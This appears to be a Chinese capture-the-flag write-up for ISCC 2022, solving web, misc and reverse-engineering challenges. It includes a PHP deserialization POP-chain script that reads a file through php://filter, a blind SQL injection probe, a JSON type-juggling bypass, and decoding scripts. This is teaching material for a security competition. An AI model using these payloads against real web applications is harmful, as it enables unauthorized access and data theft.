ISCC2022 WP
web
冬奥会
源码大意:传入参数进行json解密,成数组形式。
(1)year不能为数字或字符串,但是需要等于2022
(2)items数组包含3个元素,其中第2项为数组
(3) items里array_search("skiing", $info["items"])为真,但是不能强相等
绕过方法(1)用数组 (3)用0
payload:
?Information={"items":[1,[1,2,"1"],0],"year":[2022]}
pop2022
pop链:
1.wakeup 中 pregmatch触发 tostring
2.tostring 中 访问不存在的成员变量,触发get
3,get中,把类当成函数调用,触发invoke
<?php
class Road_is_Long{
public $page;
public $string;
}
class Try_Work_Hard{
protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
class Make_a_Change{
public $effort;
}
$r=new Road_is_Long();
$t=new Try_Work_Hard();
$m=new Make_a_Change();
$r->page=$r;
$r->string=$m;
$m->effort=$t;
echo urlencode(serialize($r));
Easy-SQL
id=0到8分别显示不同内容
尝试bool盲注,提示select被过滤,尝试大小写和selec<>t,都未成功
尝试爆库
?id=0^(ascii(substr((database()),1,1))>0)
爆出数据库名为security
misc
藏在星空中的诗-2
用表1替换为
\u0049\u0053\u0043\u0043\u007B\u0044\u0053\u0057\u0026\u0031\u0063\u0059\u0051\u0023\u006D\u0057\u0047\u006F\u0032\u007D
解码为
'ISCC{DSW&1cYQ#mWGo2}'
套中套
png尾部得flag2: ZmxhZzI6IF9JU0NDX1pvMno=
flag2: _ISCC_Zo2z
png补文件头得flag1
flag1: wELC0m3_
解压密码为 wELC0m3_T0_tH3_ISCC_Zo2z
解压文件,用相应值填入脚本。
pubKey = [15042782551062826353449219153437381092491258730160867156744093072399739730930463550863350953142954237294218962821287543459468019332283142650664956804668302807504579404678740141579877002960413, 12708158598963141934391685631600516490669217139089309314888948234055780439715902419330207083892546220623513547302995415255720351813903602785119953084101544903650534756744299712354387675652971, 57588081600422415019276183827808747644146482343538012980806686148759603202353970089424246795034196793973953647186915472861443492581179673180594244531467213654669133463694957205579317258801718, 28257616041478828496298986073424060468476707576668145513155239901186933167428106500708126684633229192954669653335099519245347915809788189845488960027736926278532404277976639249651219113140616, 68099421397091539348865925453773951457223967577014978300156927390610554870390301664615422331904027377996649068417556814162434358757225280803445758200772663153083504198028209147737444960618773, 51065496983270224426584089508594643324279265537422224665253861300582393901678641843426912785926719065131278921701622086094669807291596282427356148334126362169843950306858942672225620393418592, 59772020305692502758209559319642083465221914351473363439581389286919569674833171722662951784015042559025194310511654275194249238162424643116959615130217629987508034008285626233963866092351524, 21780657422829716602583069978549515842588669809318418128555009989750128205435919701063365001762832338080961642820793841537896875000125318446564788690880705531612413751368655321373732171863913, 65064234511884312428775675276046730382712759643944031901840358499906998098545816233759331756739121990956623471589739691258167553741105654275450404105676309524104375967941026145004969261801645, 24462056350988667617211812205010810120941729628315476705885734884830541125926490673253513253416352279326911193887327098669504225506169252137577756749409655904146186069478086181850323241039969, 41236113881332628477090741554808881041352360204716223003963049714853217602949754939658510944777933955790057545811376391267558566357434669891641182341511334280294429726435053041124870293275709, 69774778162254525368005645354945513438673234561438712163793982719127980039216135283928548031181120807456252134141047470191046200110748742848616558691869309038190599887169470669797415392486925, 21826661723977829722518957117966012219109008028491363014399327679994072107300547128639612845164309665430943754556723385934751018160513170980390184065366835523389285454852214338254093880451397, 25251669664506570770780403783298416148338934480640525681041944938889634657390379943629380812391329400215787058077773766483739841346276423019750749309043333801125989340012020022127414700602907, 72804247256492596326411683065251383463466083937798397424405349191673661328878001736995137872177485609797820750453728341730394286785785532820617840739533681350143779052351197243171561139346487, 43314294324840068317487164189681328862477907403847740482103772519344424397891099265352463476831166131534457166388598515117739015922778922415590755011199557465739057218073138219803772421308710, 30531076653691463660814348809859543420147278800052054339171463485900669790757081064209369553420953323726769699812752642650269206188786435641995075302044251690318201559426884632668024944120107, 8819019764943036361995752873610146824718625726927121178015145381051708292425839682949561871114123418941045133424683414128803932613203087630497551738196194690144286600560470202899033839130604, 2829041390931803087612324629756931580503837591652153205393850425409022886282992972213057975502673269071611591708571199414804953244790720167855614229749245019673097089858506848965316613814229, 32136356281204277214854272927832468140119796491037161489405567486001632806660263193674647517451666192681886995051500101244642815587392492132211173756605547714476340457416793540839620241472917, 74519423338371506997749938068935416694654685346668188413135949961436750930220606641251927721403120752128775653231955857848257196939991847333890930046808231627519758140257792285510219734351001, 76969681599837879742802506978595950574558268202959329133441259289955430225817007097559943594525128110570925572354025805818188864457625774286913536381044940587755028500659877714853209157429001, 59678424268217372584626639924904604013798221580195946279748917202988688692958666434597564959098256847143334651531317689910948525229123391154831395450831266018926643970738519146050238598255971, 36963641338425594297641327010336219250587417347275517562076674689120452439260307767710584832079870818580360727929454027459828076617818275295622920151240969052757130272908330448633259824381935, 38169823089657870140822204616368880135032733936677068226130107023952466257392719356226381603295343964814413001529666937017135403454199188871723688700782809780747318395336681047932288907738805, 48392492804462468969445617848413086768384949159015824642891111376567850834793812048111587547974541165833290534659076960106521590287478526635365187771589990748891568260519617898617734328412703, 44322883873455662399467020134173248766827944766104446425858015132785332817320382505837785613930105829981953365664535431080640334707112402969172294656387441696118359336245952130492072366736938, 10764382579399984872605382543560751292167321906895357968429228718637362367860979272153532058614770078285686311551097077253832746589122424668193860841343125282962237698827598248852551403641576, 30242579837026962012578619661656478327873318674757717950661282926018967993683509695587652551908838014809219566335601259727152715443669218996605090454136192912336178218149300728434402055098465, 3539542801785327114873367512756515930243105357761138991536390766177842276414850502533421189133872755719729121250947482111749122907555618230329598461269342943104066098603304659101679059187449, 12559296083618340971226708825079552643161718230134447997535775389742969222742719464000077638139422776042267946423740847772724079668937328872763713827880961030721732339402858714290982014389349, 17644766679756167346128261565214146516412316674549102173204697701992116481217002705526668770650971501096352581443357828193691921056657826137179974072291456453459112396925912252777389578194903, 28173800359608362526299901585267673739119765512948759931995014073442436421980329315042139509045121851198125430953538955906354000517824494814856735176170273069840220084473614712819888238711118, 29951016768150803304845195584256194806476585557349286223392717100216954852622862509971141247055598111139272875057932955792572233646769408956609518095459279192307443006824691056734284841857732, 12790383102858019665508732260600905604367355402616614227909019642159655190051738731123600767961339696261389453487528110978458343669257713417509355849811621138151273701802606846916999213780976, 65837837838208498505474093538766977631680625547915095851558305290509371112995731392559728323791153959560808145435460346885263877769063635255632160749139887399241530831849461440271463483385072, 24238032764131238209232307449175450132827383707597841910244154920896353512985180693260961939432193907480244378478674484908769012968945884931623756285247313846176346401630307898506079132320496, 43358219288152633242724912482238837208629272436545909801865962340639133965931057988070783683388295299362761260300157185639433703282298589594860406290738348758826058794184840974009449174779219, 38761929443594204524911287934470246773610472065208593661844247562414796294297148755259317275449671397339001195916789094839126413594271330800103109610015602346485447502913710066208158862396762, 62143763363277165502157134058814908453468539266420936285680951673240289099125660525595301567825128510611585419133416358563556849465443916305939439223330371037031691737599441760775367810181493, 63972502725488141279481318773506694429766379813654059546269713927348565012155758461162969786450688683688442639101369183770989284045060295199068676366021211103988696572835429854637522715017022, 22073418164443414612352376488521795917845160867981382055313121150264515356614883659090970968589733197036319330429261230902625061728535308589339042529603165954546568159995465381544077750855550, 60360146510156964889106116048058393182292769659524022822866638323239862895824908594251936795274127340626285394650277283901286399111761830124978466168514494778792101966789449658034812547672418, 46881213069526426045015096952788775800476244908109357534940003377936271174030004041142514534039750549595818264634589118784761668982823580745815416305791339809596374725261968385651126402704988, 3572672569329478674219744264881276160911697288755050307216287760870805810623331213365733574490410751891895350252291153253415400079375539785211321130514872203591678449286605813960061432885626, 66243097723110340722309212073101492621828328620027837444661766695605272470365537467805274781511270570583358114866415497611414666521010448816132740333858466276295917611788096186878039374811581, 78873824972377447064395153422844461788571024853112352699193578833192066292764944237045944131814123754785344225281685510486470466884115498042979483600703535606084517098030965319416517449577554, 78302056846512324935705848040434645726567114696398486915942393611835056733133950772063232456666605843660726158856258668917517676335737047783452770246595722882690611375302369407929730882241913, 21565647397233635737119212575985677491582576732834273655074171754827339432367789268078104506937190528746035200245593611544296102442755874099070826192817405640465611083047889172153040970230828, 31936724560289182329030600592352553760346512409083950745948195718514178103650068600107024239246959937017198558650479571501610966138420869227528877060995696732650376207481998018762559017000331, 13576060305172907329200577147997252573543022487195987997310228987242181483770671588089150146508068205940359384635158834862231114461227712414411588048699268308104184724684310850569406550082102, 35177829393545448596565762053594941805213126588641840135220830076504508059976634072681452731357236775235838718373241928243620260107725258338491192188864257411472618381655775776039025106315479, 54373619052846174261158580016286126637321343782025823448780390792132619886103477178826236357656551108628399066745478285657162842926610550416089333323182004585051444021635730852815008479341449, 34101604622619090190259783472823532074743340481112999470099712896675706897644967061874741211324535745645429124313859720825206465654149651202416149987836929041424620564088320387348077380838233, 57093606763250436634346199585506892589916101539079559491863626464677164112934331391258691124107095054878239411796594136087731155018937101663915719203273858846625751529168544333411537622764828, 44286817116102374188187855521865561084063804517678381312444654033678089286502212306066259077323610145803900044615032467339739603872186493086320109248561989030428622060403913851135809760233644, 14526169719776491860398959283984535422589874720544977117935043717824444462553418186132220136793213167996376842560003762726158227942644715669110519320178365152019997328403568148149116544558108, 35159444356626751317550542761650865253611456987608881952451985929904012444629678507891799489772511109858838278927275351598616620512750518651395369906734995454216216628120725618638522364792265, 54853152393072411238336505319042161475443861004371921076323299668698688163927322923962657089290659913087522666538733316501742532400333550080195805908021160934657226458842960176157081198987246, 46689325317852388218409938432429478293364011915493922910439453428936373796284315989140922699227881982598192961391649017362560731852848983059746522950603135430274982731687404414540156512584254, 46947784437395214461090734697053378208240713993224948937746981550785780407065000427841251220712561121577589392432843727058202636710090530270740221058835273387206333862416512296154110366505511, 32439904985839344471848652696004163517423400818029192829626001958206433674544265409169519786433525047874951599963894381802179092288631089853139581651004364571245793357071577459379541202860596, 59932883003721651793213958072314797524399076990870397543201629928429442429039442152713904260515269045390020187151867400885117980118683862739860278104143349319801062834643918799288052364512138, 2043157271937387952260645910991980143452365664110542996697204766014813037402426066699924813896922572142996015905046251762488583846158993722160978211466968472261084049445517571922769836340516, 74535714853398827891899459730973034116774713342234867432175360774330319613103994130932033560854361132967604379317144335403492637706028316509233049363638684406905981923414022791633643189982382, 79839071106052147580875062953117894650705126753914978078281275597237509384716765927108319569630836835692694152305256840719825949411746579871763032137651072197461888364919966926305796415802455, 25702528295643082231972770914993852866770278703588679116964227576541867827042636821539580156701572184639410201656483946227310732430876099929583830519363233123441060388838983202414171990057995, 53925739210283964097983089073743567429972329243562357769028566205150823515391950766568201763818640730301245211057717124540482488176329954863703403090492906140610472017491818121938986390443094, 78992939971861515691538689387481599165268978593393437692332273129510006625617712389952656702302830447178363334428699603383859817980851591165330666250780099044493095187051990363405460955521147, 36995776561761055081907371548883728752080377022243883414948904036261982502332284012390969802161215159757782593889494556210513846374679665226426287090662816421328615679799395813004228337627285, 24908193051308123109347521951208188100328469488329544462679374722347863879307242286029048156773536805363630916907538380820509382167133579631342347678049889242160099948933390097471271356884036, 80210582103759038494365441298002089873328377659207404174243473217104922066606929696617640799885353614522637625840542875482456702277420311521551766048164416970591748333700568857713381006797459, 10445982133767196624405739958582502871785631132454629149178205326584732816657957873136410788699693426886942092948217148167722129108251046897838084829383891562969988663684771964242024236731290, 45460179562295385315972652488648825230149332852387302047228685124638217338757057675767430023483860360009873079156539312424567524725338793440937814585727329173403836656630876159338778266319381, 68117870952268933648529942356447977272844424970878648425276333845764665439300372625357161813456211839237044941087138714758203318026386927216163073237675916498343747433279565150620146328861435, 77325575859112520152918066462700643509937630341497665565418098894687268553446859084368557974043398012866671702107879251695032490584800612410964157505303358592098689173160437540340492065091523, 16396118715104736147633307930492205361061968925095040357781159932649566659040772110132674635827046951501008931998293906328391646051713653359874172106209708718516475888691336137561034996394556, 69698607746852385815188882680094869868875637065516495916697536588897959724740817294208132669621895945205575553660603365450896295967594116972332105399380384066865112441229717794667798688328932, 8977365224503093231976466351982656472967562188924718003956867329408052520224106453007529991738110378290572268742658508680082123756017332097495977781645435939061348264256316658716641356713342, 56662837825460249195565192208710417575108076216658767415145812773857849889972523112988995597547482996815791417479359326223542203307829845379052707013430053832200018363184009631905956869910406, 69279551776454779171569612564044652733703538977000196417627695373021847925258733247057900906443696858372362194592936606488427803303058967679992403886946699897142822297562701750874811029152672, 19952134631392290018492491465988778857608007992032412173979606946129031464063692599723751300226538618265096460896691105928672192531525144908939309163069823568045840332566305868312868955034325, 40946978577866170088097792897522559161889562205864409241218105473542302080504882969543436375758040546692398830600818689800256921233739158338453282311628870643706071696036001763958058653020228, 56141769881030994309046934868244037272509602434356969269335154517312597490685422912952731721307333624661604883495224027917060401948705936953019580608881484118647345680065906269362690942853288, 6434826160488707699824829771385644085760337898796178546131213730743449120877750443422046208754870793768499590098565899767174069137960743256244473820266870976146071709093170569642288396103845, 2793379742814655670502362707557630129290843960764670201443857528725338373019640761927411462429454294366392255657309003186633395858349156583889557536217022559170899425011469736195896834376281, 12260987220131852629948985002783790049740931588444988938039992461090327319379988648351727020003578079063988607848232298598960231532317927838043471494314265130462655791166469925711968810169165, 50631300310233662143489312214586519858621919343553303678693025436278535462497388699578308247214595382369569567743505049692642814087447932839983213309435490490443056955016382722989167615388366, 12553368074885744029293750272281662378486767467387156455798593837409879653726046227544387645983913275476600895493239275856209789318307444291579578019945262621206254598330095825237017871255339, 61464238074596902834542876883460410926542141129568783326984068255995985208830724727809663926790798339975204454916566142669492382333095605491729473507871053640826065471054628604760376952616234, 44718114734619741230075735575637187973343747794675737428420296521331307825678517335827531001483619954322535390423393410452471525110685283805649519800772880120253587809239386580987845089043237, 24697180719210455018046297290028166853491586973939388999059916262647761995822689169317398305570611791047273436044113517505360287788011080572365623192441946359587338324185625293056559459430883, 67473689302478592264538121021505322201634732883843109679371224547790555027739741211509792696665848127667538470585206707754971566802810655972462313219666342728746794770811324112010521235114721, 38518825512190881761367215522268251365271584728232566017528778907849097900614700476659693588202587190566612599669782117539001536585638767742729980118059508564712907180427728678137810106688990, 37308517159042591156751258407802094095134900817583060236342575906230521606049884335796069044153147662382141429989987568710838860389965533469066147323814562256538183659221667538703406911851025, 54626401461311881553279809348845978774097768011822588661801203752583526226852165790687087491332270659245538962927562472717931391585886494884096587726242587722167303457053355226645969402711805, 33941157349036665993670450532253229395026192167019035991458699599004564185820932706300689111353079549174130664641345195481449535102067648269846179934996162714822772741702681084007907696443237, 33281351217323475823397687146504907056361060212789644034679688709241318532506360705960191515390853801264340802849355819846935478171818210150223504799541557383591740699411262179367441084888341, 5446325595900071615506022737098532935553426659986086098625979320795335548776387706768664996004381992439642566954794820807037104353762531569326108423787498834346914529523522858688438068232779, 64601784382182510495133463830100500480249056213074318422438937845597892925657066594503636471550963841276744455385692372205607637871657027778444233808452892125644924558335691863915450433010979, 21975549484169701032368435809356903619430403483947293822034902330374087975185387874628695569137541459309795394339764272412193393219047722111902563055965956492258346255782115447104240358850522, 25274158157292049860521636097412941703336175172586691933967531657610285358222406968544385364889358858074521358248267186183489311430601572203861755994975809022883581717435994842731775823898580, 18680047766944248528919929081179924454387007263702673423109604623246649566616126214142207191472148372970670553139157367168764335421421088285137697322469639702244746367288036308634924761509316, 21805623359114360844856385490363200289136287958053179521743314286585995240896591090343755552759150708334004103262992595654736488492915583936886173787631981508713845573336176459527407660618751, 39955971771775349928059967671511034265898571719488529293583560185852287567081929841438106254021096469757595935510035671439609887464242487770793892665558617621060087385597285603347659775827795, 9018022463560621711678819255727887106286933705574041789062743508113185961101293989788657950073946642579265146868952525334570528345747899395336276376825549331130413505354447863773049758194718, 62345318528436645749837401518009020039373568549213657798748849424431388684959122156238232755281073383123654224942853422241618386838775059014482894522314272053349661170898882762276561306070024, 4374496779007789960457690417568330515955795403737060237433333197140250165962876131869920145685684310015650941462319178987057315537457067265331154306390725812114016087603999115125353159159548, 43458237026461981428144386896062482819212698293287326246108368902763354360094718277655230793669326857963665322762104782122218042086212282756699021692163487649032272624487163147616493154277397, 12629314568463502330227148419393565984245048845332112540652293529614686854559730255726841877498365171477809791012513915337742905839555024119819252517954367910267577062169903458105058682635217, 57727777953940570125141693816515611529981070761867980312338853238612721034556592675841618640036721993942876734658655042021773389759672883893771398952857439894177397806094260778675544447104784, 21897138386584104143835993273749292080553601966827333523013142701758640291135590827828139831135316994736933810029268390154955155749988993767405757125399751091276335267406958131871001508493696, 54477993280458004709731005665058770922428344605238403809861099395662738158730729385667963827956568911998114742775439128404798119938672703038388708011753515642755038590190512388906485581731456, 12804253910935149544653508860492058254882168308077854163735251710797986622155624699780800499857072680353172608442075401532933945477918973856132277203359998269303703446759463475785876573512575, 77186950474109348611756471719641859111972176558221353888848097385483351483057918163762642316248305722450541488662216067069146174391339793840725833540781596700446546401366691644557954057146851, 32596056140321923244407556104333624264553773334100402317618192198682942979277578950515985767402209923653525128391921563192906017949622099282455060183703844058746623621638649486251131998138365, 72595014142986247489186394567236561394422229420825331791567534426437456805451036152015904685479421189601520424577880290824317765774388381311172654190572009880713478801598647579844148061737232, 58139857482872468736636802563344893751123934327342304826280581716318290723015896207569316135501515575537592369720655912400988021297863201039669973370117035947562288746847663941959479075625168, 61730626866496505104860859961578747592976012010423223335362598753470655181416820055743324060262143679663921026402039421935726694373051847890133381886244498111855846900528208838333195117873074, 31340343558054252874789955025354802340332121129494049645361948144096417027148914964389439813173537228241926166528593314261748880404638246302263048547065495418301993668618282784751406434779070, 30858222941091754595447485916587760194011658495550003013668997984342961791874936285248258215972967559227635257594377247502802612880904799009389636738402079641568808709229119124264206681092886, 39117812627888784932768113669337159457090351761240367596245146506547655704163261149315921659158019120673254183005121528108092833151191620576706396380892678321019142684464222178154862932532496, 24366311217600561057540781699962819690354639180455716448962095300448808019314567600776641924459448033416438346218460289094266616788549041630111192392739002999320266228716498488238824364519288, 31495253638800621834365334933424760405594620442708359726507026063634504821530149160941474500577427590564253512829735650028069406649167488783770048885438524935688610214147248018986788506386863, 22130871280346254704377852543806351955014849259070547372935196007691102548514594960086604474564778625595542716679181284735287204413546173451512345821401857746034646649610169901880234564109034, 46909779432192142812235274928086442798864158461228138848381282782388195353148780696794547305396792204850935129024410814298633238539301839780665857146266569446978384071144727673136791940140871, 5618318802929004988773691510895231192232579827256671140746944484166877676223789616503988398954003971114249306588546914837808596297080033056943838097726303025057419012166369347675680989772338, 22515315895874794918833583572639956168829513745154473198385700174485601965910644602520402620978571534662601209504668163692836993130256828277982662639200067511446993525576067585625534627425300, 78561498286116419849681422918451849757638157862449014225523690196387239785883656196001539264314292728015468756369482040815991919612187045034951379179214580539674074088463033154767265561415396, 57797843315065584081860695683328472269721207359869913849729588430655414776233461133702960942138664715560704340826319997200991212529387099285453439407864464641333641334810835300554705507060262, 13535318724811597049645172465969147030390250288582947740989587646699955213853101542555845240926776358193829501953845089470262552430004401570899565105915710034565308445533361419581491233690620, 22609334590050664651367009047753068653410292493968804302959122051107021575701691482583022268619190533385092155565570136543405872130777935294909240513620956994500748704189554657578314895162195, 77891840806614251933247547931889676706678741127285600396252582056037657905717055662964964378738567053060449218428454678309782479350198988826463846992990171390199460016967568232262706877620351, 59961314861147938937013300781981319832900548642409416600837687205884904800796144185934881809120428519747038595093158850657389808219109404994553435579305393776439658938085665211630472862969990, 70170138102832909988564316070716179118689674196707964151982573196807638271058724638628717023330822090514932547767954907214448941023734359649008629643888019397815437107189781445525795410894976, 11086118005421413484668048243338627589382517098204014463151981610167941552096352096513642632625895605348141035517111641372636497420488493379062313243224127749328504890793963763427220892961313, 60417958006112834238434650044253479790131658557426782541762347568243177834851623093631276049193842674099339728308010331956154050264482987204418268448386078016752235441331454177028263362804530, 42522836710660692603466947808474439622925328315557143362880220419560993323137222646669081318888186632247193500627513955803741837035473700354802711218963337534769767271910289553176621500017509, 17698549384871050036877466293834919431303964061763225803647457766428742512510484097838327848010150428401027603225054638285709003134354175143608424281165336126313221536401960176671286642120072, 52052641059293941801389902133221286159972683929147924084165353804669322254174653350336090339126740856335484771977934847735787380940005557449491922137939221012962434246919372728500000555755189, 66254018100890176809212609384217045937730881438222724536387637650346757844593917301214871046756881357465182718021263200974039590467615247977376490835002167934106267167059275009381038335703346, 47582673232943546922713046787214612290288723699926806921365302139569444253355257670504050164514323978481575121210977392003151023049984874623512492936915800025632662840479792533594576404595650, 12124205727320460305704604921524603487151483021792544799470397712951338332037405962072184076105617822804088229498663630064790230037925653869830998580287072276690544175052730089921048437132522, 58940144424315477280067114531273656113335108639713211956562534924635194287190669209586597172415483767098446264523530576346747863993617815729163990046705846833904057962280960184753726401731781, 36303687498443488856243280949522597066888598432907125606006270659222655926056241333145645194528200753487105815000502159429756755900395476080301445950826180438248424571892029764968615907681896, 48526099366009793486432403475975829682995165814747047353498985958088453166214232971679991264336514849930636020243837684394318617128858681218211824802225819525823454382992875581450340121862551, 63171820643440725514683666561678721448683148566641198309479897134097309568465045339974881964405845450436543975326670366194025132298877142505536632282328119250108245934276695801871660869469907, 59154621968784606734912954480830481751827968515892582093972558936230159280542091469212163347559186706337126193173094138978079085816361424116830398003070422317768207128923198319072004011689201, 59939928247829695255979572505553695885355330114979785736579160289518090664775853368404617670213849799277803140882566490773038549307439732234498286987282875633759468555026976636192221425380023, 63296991287472802105552279399747292254748679664305826000842674458904876938795037996715353078714815563817620609291590197603547975344951688229812576487735513655797115469463730725957771622478077, 30232046579729313201096377433013283736287739765764487439853489447328616418874972945210528760226744160036572822538922154200559882108792902739148413145505778606460406380833508051347820103004546, 33266941462306542355598432373905963924875150326250546600293882121288421548544316954316599595948683882926296060312666015874435732839571416026462855635892924439727523003229146644373317362698065, 14158543600529223486181790748538709992649161223883927161344090255663842619716892147571308474839990331626747275060971225027958845602999259054541210943684034360349653883708603902823249461720897, 74257614140858216226708649148333433723790777590822088979961685276971309172074144985243172748564441195629642812168583883277949431401004422792484685803607089157634941011560468383625846263114751, 52107079340780009141200899434801304917388258168092851925703263239266518947086142844572904363148587208064777913521782948099272257704472550946452097605654135029160083169453646530409865191521820, 61280316587785421827360870854627091845697095249466681884788693029025686672262219893908904218191337584950425468474433469834931591833294953190822303225585687267194135811644795571536130837657044, 28271329949593454365079986083068022597627393713235915095392897729107436446217743899214494649181045128111297378443689090053056181998077745673683406717276007422282512256669932592023997449259598, 74990146071943711235963446674487291929108904523383667980405785428587424012354855112776439137561315191917318044115701782648871187300925874403987070294832355839458703610954825619028416397243695, 5210659969185218867979067066375006674087176780910881707888530934840808003987123748322454712166729892026427309396801657469477688865431787837695970908349256068309806498714046186295534994028917]
nbit = len(pubKey)
# open the encoded message
encoded ='3403728658726426548072146008040150532969226269590496683405662005829537053638782680665273026996590340239679055824074438860170559101115707157503720999893785752644319271593130476122489501245369761'
# create a large matrix of 0's (dimensions are public key length +1)
A = Matrix(ZZ, nbit + 1, nbit + 1)
# fill in the identity matrix
for i in range(nbit):
A[i, i] = 1
# replace the bottom row with your public key
for i in range(nbit):
A[i, nbit] = pubKey[i]
# last element is the encoded message
A[nbit, nbit] = -int(encoded)
res = A.LLL()
for i in range(0, nbit + 1):
# print solution
M = res.row(i).list()
flag = True
for m in M:
if m != 0 and m != 1:
flag = False
break
if flag:
print( i, M)
M = ''.join(str(j) for j in M)
# remove the last bit
M = M[:-1]
M = hex(int(M, 2))[2:-1]
print (M)
得到
159 [1, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0]
495343437b714f31492d6d3775732d4e6550547
解16进制
ISCC{qO1I-m7us-NePT}
隐秘的信息
base64转密码。解压。
stegsolve 提取 r0g0b0 前面的字符 ffa4a9a1a1bdbba525a6a5bab718b5bb2735b22abc31b53631bd3efc01f8007ffffc7e3fe00fff0071
转为二进制
11111111 10100100 10101001 10100001 10100001 10111101 10111011 10100101 00100101 10100110 10100101 10111010 10110111 00011000 10110101 10111011 00100111 00110101 10110010 00101010 10111100 00110001 10110101 00110110 00110001 10111101 00111110 11111100 00000001 11111000 00000000 01111111 11111111 11111100 01111110 00111111 11100000 00001111 11111111 00000000 01110001
去掉前面的1开头部分。(7位)
0100100 10101001 10100001 10100001 10111101 10111011 10100101 00100101 10100110 10100101 10111010 10110111 00011000 10110101 10111011 00100111 00110101 10110010 00101010 10111100 00110001 10110101 00110110 00110001 10111101 00111110 11111100 00000001 11111000 00000000 01111111 11111111 11111100 01111110 00111111 11100000 00001111 11111111 00000000 01110001
解码ascii得flag
ISCC{wJKMKun1kvNkdUxcjlcz}
降维打击
foremost
zsteg -e b1,r,lsb,yx 00000567.png -> out.png
出来图片在 https://www.bilibili.com/read/cv8724055 这里面对比
四个为一组,中间用-分开,全员大写
ISCC{MGAF-VNXO-GUYB}
2022冬奥会
png crc32爆破。恢复后图片上有utf8文字。
解码问你雪容融原型是什么 。。解压密码:灯笼
单板小将苏翊鸣
解压后png改高。扫码。
回答问题得压缩密码。
解压得flag
藏在星空中的诗
解压有个PSD提示。图层透明度开到100%可显示。13524。把Poem.txt按顺序拼好。
☆✪٭☪✲☪≛🟆≛✪🟀✴🟀٭🞱✡🟇⍟⍟✸⍟★⚝✯🌟
解压得到xlsx是个码表。用12345的顺序把诗打出来,码表替换一下密码。白给。
FLAG=ISCC{GBXBLCEHOQVPVA}
真相只有一个
修复图片。左下角莫斯码解得 NOTHERE
stream看文件头是个zip有密码。
flag.txt后面有空格和tab,可能是snow隐写 。但是没解出来。
re
Bob's Code
main流程
strcpy(enc, ".W1BqthGbfhfMdhBEVY5co.iXFoFlqtVJ3WNfTgYpFoFXVoGMbBjRQcNpwoF0.");
lenInput = j__strlen(input);
base64(input, lenInput, b64v1, 0); // 普通base64
lenBuf = j__strlen(b64v1);
j_bbse64(b64v1, lenBuf, b64v2, 1); // base64, =号变. 同时换表
sub_341023(b64v2, out3, '.', 0); // 开头加'.' -- out3 = '.' + v2
sub_341023(out3, Str1, '.', 22); // 尾部加'.' -- Str1 = out3 + '.'
sub_3416E0(Str1, 2); // 变换
// 整个流程就是 b = '.' + str
int __cdecl sub_342D10(int str, int b, char dot, int n0)
{
int result; // eax
int j; // [esp+D0h] [ebp-14h]
int i; // [esp+DCh] [ebp-8h]
for ( i = 0; *(i + str); ++i )
// strcpy(b, str)复制
*(i + b) = *(i + str);
// b[0]='.'
*(n0 + b) = dot;
for ( j = n0; ; ++j )
{
result = j + b;
if ( !*(j + b) )
break;
// b[i+1] = str[i], str整体复制到b+1位置
*(j + b + 1) = *(j + str);
}
return result;
// .TVrjeK5EVTi.
}
unsigned int __cdecl sub_3427C0(int a1, unsigned int a2, int a3, char a4)
{
...
for (i = 5; i < 19; ++i) {
v12 = Destination[i];
Destination[i] = Source[i + 26];
Destination[i + 26] = v12;
}
// 换表了这里
解题流程:
1.将左右'.'去掉,添加'===='
2.通过下断直接获取变换的表解码.
import base64
import string
str1 = "U1ZorfEzdgfIrfixT1rWa.fj5mW5oazH3VfVOVVjPmUZUbfPRVMPnd1PumD0===="
string1 = "ABCDEfghijklmnopqrsTUVWXYZabcdeFGHIJKLMNOPQRStuvwxyz0123456789-_"
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
flag1 = base64.b64decode(str1.translate(str.maketrans(string1,string2)))
flag = base64.b64decode(flag1)
print(flag)
# ISCC{Zl4u95aG-g6O0MHTF-ENVdV30f}
Amy's Code
1.ida分析输入后异或 sub_9A15FF
for ( i = 0; ; ++i )
{
result = i;
if ( i >= v3 )
break;
Str[i] ^= i;
}
return result;
2.在sub_9A1433中验证,有官文。有key。简单比较 脚本解密
key = list('LWHFUENGDJGEFHYDHIGJ')
m = [0x95,0xA9,137,134,212,188,177,184,177,197,192,179,153,129,196,124,142,174,106,184]
lst = []
for i in range(len(key)):
s = m[i] - ord(key[i])
lst.append(s)
def decode(txt):
for i in range(len(txt)):
txt[i] ^= i
return txt
r = decode(lst)
print(''.join([chr(x) for x in r]))
# ISCC{reverse_4e7Vt1}
How_decode
xxtea 怎么解不出来,调试一下。
delta改成了负值。
enc = [0x4032B60D, 0x89D521BE, 0x90361747, 0x3DA2447B, 0x2B2D3109, 0xAA937352, 0xE77FB14B, 0xDBFC42C2, 0x9293B927, 0xC1CB1B76, 0xD105288B, 0x4F0005A8, 0x18F3886, 0x413CD540, 0xE8EFE503, 0x9F895C25, 0xB67753B5, 0x1FA5F1D7]
k = [73, 83, 67, 67]
delta = 0x61C88647
研究中...经过仔细对比,发现这个版本使用的int有符号数进行计算。。之前的题目都是用无符号计算的。所以结果总是不对。
直接将过去的uint32改成int就能用了。delta修改为负值。
#include <stdint.h>
#include <stdio.h>
#define DELTA -0x61C88647
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))
void btea(int *v, int n, int const key[4]) {
int y, z, sum;
unsigned p, rounds, e;
n = -n;
rounds = 6 + 52 / n;
sum = rounds * DELTA;
y = v[0];
do {
e = (sum >> 2) & 3;
for (p = n - 1; p > 0; p--) {
z = v[p - 1];
y = v[p] -= MX;
}
z = v[n - 1];
y = v[0] -= MX;
sum -= DELTA;
